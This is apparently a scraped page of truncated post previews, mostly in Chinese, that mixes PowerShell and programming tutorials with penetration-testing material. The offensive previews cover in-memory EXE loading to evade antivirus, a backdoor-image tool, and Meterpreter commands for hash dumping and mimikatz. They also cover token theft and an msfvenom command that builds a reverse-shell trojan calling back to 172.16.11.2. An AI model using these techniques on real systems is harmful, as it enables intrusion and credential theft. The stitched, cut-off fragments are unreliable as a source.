pwsh -file C:\Users\clu\source\repos\Edenred\LISA_5.0.0.0\LISA.ControlPanel\LISA.ControlPanel\bin\Release\en-US\Resources.ps1 C:\Users\clu\source\repos\Edenred\LISA_5.0.0.0\Solution\ C:\Users\clu\source\repos\Edenred\LISA_5.0.0.0\LISA.ControlPanel\LI…

Grant-Permission.ps1 Download the EXE version of SetACL 3.0.6 for 32-bit and 64-bit Windows. Put setacl.exe at the same location with the script. function Grant-Permission { [CmdletBinding(SupportsShouldProcess=$true)] param( [Parameter()] [string]$C…

当实战中我们想在目标上运行一些相当复杂的功能,这些功能常是 EXE 文件的一部分.我不想直接在目标上放置一个二进制文件,因为这样可能会触发反病毒机制.一个很好的思路就是将二进制文件嵌入到 Powershell 脚本中,并直接通过脚本运行而不用将其写入到磁盘里. 大致思路流程:将我们需要执行的exe文件二进制进过编码转换成字符串,使其成为powershell脚本的一部分,再直接加载进内存运行. 靶机环境:192.168.5.83 windows 8 x86 需求:将helloworld.exe用p…

0. 引言 0x1:载荷是什么?在整个入侵过程中起到什么作用? 载荷的作用在整个入侵链路的作用起到纽带的作用,它借助于目标系统提供的某些功能:组件:执行环境,将攻击者的传递的恶意payload包裹起来,并解析执行,使恶意payload发挥其作用,达到进一步入侵的目的. 在载荷之上,攻击者会利用各种方式去植入和启动载荷(例如创建服务或者创建计划任务).我们研究windows系统下各种载荷的编写方式及其原理对我们举一反三,深刻理解windows环境下渗透方式多种多样变化性的深层次原因会很有帮助. 0…

  0x01初识Meterpreter 1.1.什么是Meterpreter Meterpreter是Metasploit框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道.使用它作为攻击载荷能够获得目标系统的一个Meterpreter shell的链接.Meterpreter shell作为渗透模块有很多有用的功能,比如添加一个用户.隐藏一些东西.打开shell.得到用户密码.上传下载远程主机的文件.运行cmd.exe.捕捉屏幕.得到远程控制…

下载:https://github.com/PowerShell/Win32-OpenSSH/releases     问:为什么要用这个sshd?答:这是微软用,openssh官方的源码,源码网址:https://github.com/PowerShell/openssh-portable被微软编译后的2进制程序.2进制程序上,有微软的签名. win下,免费的sshd,是不是微软这个版本最新?并且开放源码?不建议使用其他公司的闭源sshd,里面可能有后门.而且收费的sshd,虽然软件比较新,但…

FakeImageExploiter v1.3 - backdoor images.jpg[.ps1] CodeName: Metamorphosis Version release: v1.3 (Stable) Author: pedro ubuntu [ r00t-3xp10it ] Distros Supported : Linux Ubuntu, Kali, Mint, Parrot OS Suspicious-Shell-Activity (SSA) RedTeam develop @…

基础信息 ID 1337DAY-ID- 32642 类型 zdt Reporter hyp3rlinx 修改后的 2019-05-03 00:00:00 描述 在调试包含数组括号作为文件名一部分的特制PowerShell脚本时,Microsoft Windows PowerShell ISE将执行错误提供的代码.这可能导致ISE执行由文件名指向的攻击者提供的脚本,而不是当前加载主机应用程序中用户查看的"可信"PS文件.这破坏了PowerShell ISE的完整性,允许潜在的意外远程代码…

介绍 Windows Teminal是一款新式.快速.高效.强大的终端应用程序,适用于命令行工具.命令提示符.PowerShell.WSL(Linux子系统)等等的Shell用户,主要功能包括多选项卡.窗格.Unicode/UTF-8字符支持.GPU 加速文本渲染引擎,以及自定义主题.样式和配置等等. Github地址:https://github.com/microsoft/terminal 官网下载地址:https://www.microsoft.com/zh-cn/p/windows-te…

在上文中我们复现了永恒之蓝漏洞,这里我们学习一下利用msf简单的后渗透阶段的知识/ 一.meterperter常用命令 sysinfo #查看目标主机系统信息 run scraper #查看目标主机详细信息 run hashdump #导出密码的哈希 load kiwi #加载mimikatz ps #查看目标主机进程信息 pwd #查看目标当前目录(windows) getlwd #查看目标当前目录(Linux) search -f *.jsp -d e:\ #搜索E盘中所有以.jsp为后缀的…

摸鱼的时候,想想内网这部分还有什么地方适合水一下,翻翻往期,开始填坑 总结一下Windows提权的部分,以后有时间再补一下Linux提权 这仍然是一篇思路总结类的随笔,具体细节内容不展开,也展开不了......欢迎去各大社区学习大佬们的操作 关于第三方提权以后再说 0x00前言 常见的Windows权限有三种:user administrator system (当然还有其他的) administrator管理员权限是比较高的,但是如果涉及到读取系统文件,还是要靠system权限 和web提权一…

0x00 前言 在之前的文章<渗透技巧--程序的降权启动>介绍了使用 SelectMyParent 降权的方法,本质上是通过 token 窃取实现的.这一次将要对 token 窃取和利用做进一步介绍,测试常用工具,分享利用技巧. 0x01 简介 本文将要介绍以下内容 ; · Token 简介 · Metasploit 中的 incognito · Windows 平台下的 incognito · Invoke-TokenManipulation.ps1 用法 · 利用 token 获得 sys…

Table of Contents Introduction Key concepts Collect topology configuration data Generate a runbook from the topology Install a deployable package Back up the database and computer instance Update files Run database synchronization Start all services…

A. Using LCS services. B. Manual using command prompt. Here I’ll show using command prompt, as I found its better than LCS (After successfully deploy many packages J) Follow below steps, 1. Create Deployment Package: Run VS as admin, Go to Dynamics A…

1.final关键字和.net中的const关键字一样,是常量的修饰符,但是final还可以修饰类.方法.写法规范:常量所有字母都大写,多个单词中间用 "_"连接. 2.遍历集合ArrayList<Integer> list = new ArrayList<Integer>();list.add(1);list.add(3);list.add(5);list.add(7);// 遍历List方法1,使用普通for循环:for (int i = 0; i <…

PIC24FJ64GB002 with bluetooth USB dongle I will explain my project (how to control a bluetooth USB dongle by PIC24FJ64G002 on HCI protocol layer) step by step. I recommend you to check your bluetooth USB dongle. Some dongle has a hub construction. He…

https://chocolatey.org/install To install chocolatey now, open an administrative command prompt and paste the text from the box below that applies to the name of your shell and press enter. 第一步,在cmd里面执行一下命令 @powershell -NoProfile -ExecutionPolicy Byp…

QTP10补丁汇总 QTP_00591.EXE QTP10 调试器视图问题的补丁 QTP_00591 - Prevent QuickTest Debug Viewer Problems when Process Debug Manager is Installed QTPWEB_00037.EXE QTP10支持IE8浏览器的补丁 QTPWEB_00044.zip QTP10 Web2.0 支持补丁包 This pack includes: Extensibility Accelerator f…

当前java开发网站,通常不会是纯JSP的,大都使用了java framework. 有了这些framework,让开发人员更加快速的开发出代码,也让代码非常具有可扩展性,那些分层架构的思想,更是深入人心.这些也大大影响了安全代码审核,曾提出"分层审核代码"的思想,比如在DAO层专门检查sql注入,在view层检查xss等.这些框架都有自己的层级,本次文章主要讲的是struts这个框架的相关安全问题,也会有小部分涉及到struts后面的DAO层. 而struts这个框架更新占有市场份额…

原文:.net安装包自动安装Mysql数据库 在制作.Net安装包的时候,如果项目有用到数据库,怎么能够把数据库打包安装呢?网上已经有很多自动安装Sql Server数据库的例子,但是自动安装mysql的例子似乎不多.本文就介绍一下如何在.Net安装包中自动安装Mysql数据库. 最终我们要实现的效果是,部署.Net桌面应用程序时,能够一键自动安装应用程序以及附带的MySql数据库,并初始化数据库. 实现步骤如下: 1.准备一个干净的MySql安装包 mysql本身是开源的,安装完mysql数据…

You know as a beginner to learn WCF, the first thing is to make a simplest WCF service work like a classic "Hello World" console application. Now I will introduce the steps by following: 1.Create a "WCF Application Service" like this:…

MYSQL是老牌关系型数据库,在受够了sqlite,mslocaldb,sqlce等本地数据库之后,发现了mysql5.6的一些版本也可以绿色安装,编程实现从资源文件里面解压到目标机器上,并配置好成为本机系统服务.并且EF的mysql驱动对code first支持非常好.于是探索出了用mysql来做本地数据库的方法. my.ini配置 [client] port=3308 [mysql] default-character-set=gbk [mysqld] port=3308 basedir="…

方法1:通过Thread类中的isAlive()方法判断线程是否处于活动状态. 线程启动后,只要没有运行完毕,都会返回true. [注]如果只是要等其他线程运行结束之后再继续操作,可以执行t.join(),即:在t执行完毕前挂起. 方法2:通过Thread.activeCount()方法判断当前线程的线程组中活动线程的数目,为1时其他线程运行完毕. 方法3:通过java.util.concurrent.Executors中的方法创建一个线程池,用这个线程池来启动线程.启动所有要启动的线程后,执行…

Introduction There are few information about how to compile boost with Intel compiler. This article is to describe a simple command steps to let you get a boost library with Intel compiler support. Steps step 1: start your Intel compiler cmd window s…

linux 安装 powershell Intro powershell 已经推出了一个 Powershell Core, 版本号对应 Powershell 6.x,可以跨平台,支持 Linux 和 mac. 这使得对于熟练使用 Powershell 进行开发运维的一些开发者来说无疑是个福音. 今天就来在 Linux 上安装 powershell,以 centos7 为例介绍安装 powershell. PowerShell 和 PowerShell Core 那Windows PowerShe…

  0x01 Meterpreter自动提权 1.生成后门程序 我们在kali的命令行下直接执行以下命令获得一个针对windows的反弹型木马: msfvenom -p windows/meterpreter/reverse_tcp lhost=172.16.11.2 lport=4444 -f exe -o /tmp/hack.exe这里我们为生成的木马指定了payload为: windows/meterpreter/reverse_tcp,反弹到的监听端地址为172.16.11.2,监听端口…

jx是云原生CICD,devops的一个最佳实践之一,目前在快速的发展成熟中.最近调研了JX,这里为第2篇,使用已经安装好的jx来实践CICD,旨在让大家了解基于jx的DevOps是如何运转的,感兴趣的可以继续关注,下一篇介绍如何安装. 先上图: 一.windows 搭建开发环境(可选) 1. 安装kubectl 使用Chocolatey来安装,因此install Chocolatey: 安装Chocolatey windows + X ,选择power shell 管理员模式,输入: Set-…

start from the execute file : DB2_ESE_10_Win_x86-64\setup.exe Navigator to "Install a Product", then Click "Install New" button…

本周计划完成的任务 (1).将开发板和平板电脑及其相关配件连通,并和电脑连接. (2).将代码的运行设备从安卓模拟器改为试验箱的平板电脑,平板电脑上实现软件. 本周实际完成情况 (1).计划完成的第一步全部完成,成果如下图所示: (2).已将平板电脑成功接入电脑,并在运行代码的同时,切换运行设备. 本周遇到的问题与解决过程 我们还遇到了平板电脑连接不上网的问题,于是我们找到秦老师询问,最终收到了无限网卡解决了这个问题.有了网卡就可以连接wifi了. 在运行代码的时候,出现Application…

信息收集阶段 Whois信息收集 msf auxiliary > whois baidu.com 域名信息查询阶段 msf auxiliary > nslookup www.baidu.com msf auxiliary > dig @114.114.114.114 www.baidu.com 主机端口探测阶段 直接使用PING命令探测连通性 ping 1.2.3.4 msf > use auxiliary/scanner/discovery/arp_sweep msf >…